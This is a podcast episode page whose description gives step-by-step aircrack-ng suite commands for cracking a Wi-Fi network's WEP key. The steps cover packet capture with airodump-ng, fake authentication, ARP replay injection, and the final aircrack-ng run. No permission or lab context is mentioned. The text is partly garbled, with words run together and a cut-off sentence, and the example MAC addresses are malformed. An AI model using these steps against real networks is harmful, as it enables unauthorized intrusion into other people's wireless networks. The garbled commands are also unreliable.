WIRELESS HACKING

28 de ene. de 2023 · 6m 18s
WIRELESS HACKING
Descripción

In this episode I talked about wireless hacking. Command’s mentioned ; Thenextstepistostartcollectingdatafromtheaccesspointwith airodump. Open up a new terminal and start airodump by typing in the command: 1. airodump-ng -c [channel#]...

mostra más
In this episode I talked about wireless hacking.
Command’s mentioned ;

Thenextstepistostartcollectingdatafromtheaccesspointwith airodump. Open up a new terminal and start airodump by typing in the command:
1. airodump-ng -c [channel#] -w [filename] --bssid [bssid] [device]

Leavetheaboverunningandopenanotherterminal.Nextwewillgenerate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:
2. aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]

Now,wewillforcethetargetaccesspointtosendoutahugeamountof packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:
3. aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]

Onceyouhavecollectedaround50k-500kpackets,youmaybeginthe attempt to break the WEP key. The command to begin the cracking process is:
4. aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs
In this command the -a 1 forces the program into the WEP attack mode, the
mostra menos
Información
Autor A.Kingsley’s
Organización Kingsley Ayertey
Página web -
Etiquetas
-

Parece que no tienes ningún episodio activo

Echa un ojo al catálogo de Spreaker para descubrir nuevos contenidos.

Actual

Portada del podcast

Parece que no tienes ningún episodio en cola

Echa un ojo al catálogo de Spreaker para descubrir nuevos contenidos.

Siguiente

Portada del episodio Portada del episodio

Cuánto silencio hay aquí...

¡Es hora de descubrir nuevos episodios!

Descubre
Tu librería
Busca